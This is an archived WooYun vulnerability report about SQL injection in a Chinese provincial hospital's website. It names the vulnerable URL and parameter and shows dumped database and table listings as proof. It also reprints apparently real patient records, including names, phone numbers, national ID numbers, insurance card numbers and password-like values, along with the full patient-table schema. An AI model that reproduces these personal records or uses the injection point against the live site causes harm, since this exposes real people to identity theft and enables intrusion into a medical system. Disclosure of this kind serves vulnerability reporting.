乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-13: 细节已通知厂商并且等待厂商处理中 2015-02-17: 厂商已经确认,细节仅向厂商公开 2015-02-27: 细节向核心白帽子及相关领域专家公开 2015-03-09: 细节向普通白帽子公开 2015-03-19: 细节向实习白帽子公开 2015-03-30: 细节向公众公开
某省级甲等重点医院注入漏洞 泄露大量市民信息 包括姓名、身份证号、联系电话、医保卡号等(涉及几十万数据)
附上注入点:http://www.jdyyeb.com/xt_zhuanjia_view.php?pid=62&class1=48&id=374注入参数:pid
Database: information_schema [37 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: jdyyeb[4 tables]+---------------------------------------+| about || about_class || adclass || config_class |+---------------------------------------+
泄露大量市民信息:
ID InsureSeriesID XM XB CSNY LXDH GZDM SFZH Email PassWord BorthAddress CARD ZJHM6212270069 <blank> 汤俊杰 男 12 16 1982 12:00AM 13564318757 <blank> 310101198212162000 NULL 767793 NULL NULL NULL6212270090 <blank> 李美龄 女 02 19 1986 12:00AM 13761455739 <blank> 610402198602190000 NULL 170674 NULL NULL NULL6212270117 <blank> 陈丽敏 女 10 10 1962 12:00AM 13901995775 <blank> 310102196210104000 NULL 539905 NULL NULL NULL6301040003 <blank> 施丽丹 女 06 7 1983 12:00AM 13816434968 <blank> 320684198306071000 NULL 349404 NULL NULL NULL6301040004 <blank> 张伊文 女 08 15 1988 12:00AM 15601971041 <blank> 310107198808154000 NULL 972614 NULL NULL NULL6301040005 <blank> 卢辉明 男 11 1 1976 12:00AM 13818453805 <blank> 410711197611011000 NULL 157815 NULL NULL NULL6301040006 <blank> 商思军 男 12 10 1968 12:00AM 13564399121 <blank> 310107196812101000 NULL 727907 NULL NULL NULL6301040007 <blank> 张丽娟 女 03 14 1991 12:00AM 15216861664 <blank> 340321199103141000 NULL 941975 NULL NULL NULL6301040008 <blank> 王如臣 男 10 17 1975 12:00AM 15618880755 <blank> 41080320130104100000 NULL
还有很多,不逐一列举
+-----------------+----------+| Column | Type |+-----------------+----------+| BorthAddress | varchar || CARD | varchar || CKDate | datetime || Class1_ID | varchar || Class1_R | varchar || Class2_ID | varchar || Class2_R | varchar || Class3_ID | varchar || Class3_R | varchar || Clinic_No | varchar || Contract_ID | varchar || Count_Flag | varchar || Count_Flag_Date | datetime || Count_Status | varchar || CSNY | datetime || CYRQ | datetime || DJCount | int || DJJE | money || DJModi | varchar || DJXM | text || DJYS | varchar || DWDM | varchar || DWFZDM | varchar || Email | varchar || ETDate | datetime || GB | varchar || GH | varchar || GRDNH | varchar || GWDM | varchar || GZDM | varchar || GZKS | text || HF | varchar || HISGroupSFID | varchar || HisTFBJ | varchar || Hosptial_No | varchar || HSDate | datetime || HSYS | varchar || HYXM | text || ID | varchar || IFSend | varchar || IFUpDown | varchar || InsureSeriesID | varchar || JCLB | varchar || JCRQ | datetime || JCXM | text || JDRQ | datetime || JE | money || JLYS | varchar || JZSFFS | varchar || LastModiDate | datetime || LastModiYS | varchar || LXDH | varchar || Medical_No | varchar || MZ | varchar || NEWDJXM | text || Notices | varchar || NOWJE | money || NOWSSJE | money || OperaID | varchar || PACS_EIS | varchar || PACSXM | text || PassWord | varchar || PHOTO | image || PntBarCode | int || PntBarCodeTime | datetime || PrintCount | int || PrintDate | datetime || PrintYS | varchar || QUEUEID | varchar || RCardDate | datetime || RCardFlag | varchar || ReCall | varchar || SendWhere | varchar || SFBJ | varchar || SFYS | varchar || SFZH | varchar || SpecialFlag | varchar || SQYS | varchar || SSJE | money || SSQX | varchar || SSSS | varchar || TJFB | varchar || TXDZ | varchar || updateState | varchar || updatesuccess | varchar || updatetime | varchar || UpDownTime | datetime || VIPID | varchar || WCKS | text || WCXM | text || WHCD | varchar || XB | varchar || XFXM | text || XJJE | money || XJJE1 | money || XJJE10 | money || XJJE11 | money || XJJE12 | money || XJJE13 | money || XJJE14 | money || XJJE15 | money || XJJE2 | money || XJJE3 | money || XJJE4 | money || XJJE5 | money || XJJE6 | money || XJJE7 | money || XJJE8 | money || XJJE9 | money || XM | varchar || YCXM | text || YSFBJ | varchar || ZHXMDM | varchar || ZJDCRQ | datetime || ZJDCYS | varchar || ZJE | money || ZJHM | varchar || ZKL | float || ZY | varchar |+-----------------+----------+
已证明
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-02-17 08:24
暂无